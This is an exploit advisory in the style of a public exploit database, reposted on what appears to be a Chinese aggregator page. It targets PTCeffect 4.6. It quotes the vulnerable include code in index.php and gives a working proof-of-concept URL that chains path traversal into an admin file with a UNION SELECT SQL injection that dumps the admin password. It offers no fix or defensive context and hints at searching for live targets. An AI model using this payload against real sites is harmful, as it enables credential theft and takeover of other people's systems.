PTCeffect 4.6 – Local File Inclusion / SQL Injection

  • 作者: walid naceri
    日期: 2014-04-19
  • 类别:
  • 来源:
  • # Exploit Title: PTCeffect LFI & SQL Injection Vulnerabilities 
    # Google Dork: find it :)
    # Date: 2014-04-19
    # Exploit Author: Walidz
    # Software Link: 
    # Version: 4.6
    # Tested on: windows,linux,mac os
    # CVE : N/A
    The LFI vulnerability is in index.php
    if ($input->g['view']) {
    $filename = strtolower($input->g['view']) . ".php";
    include SOURCES . $filename;
    So you can include a fil by doing ; http://[site]/index.php?view=[file]
    By using the LFI, you can also include "admin files" which are especially unsecure, and let you inject SQL queries.
    As the file admin/sources/edit_loginad.php
    PoC ; http://[site]/index.php?view=../admin/Sources/edit_loginad&edit=-1%20union%20select%201,2,3,4,%28SELECT%20password%20FROM%20admin%29,6,7,8,9--%20-
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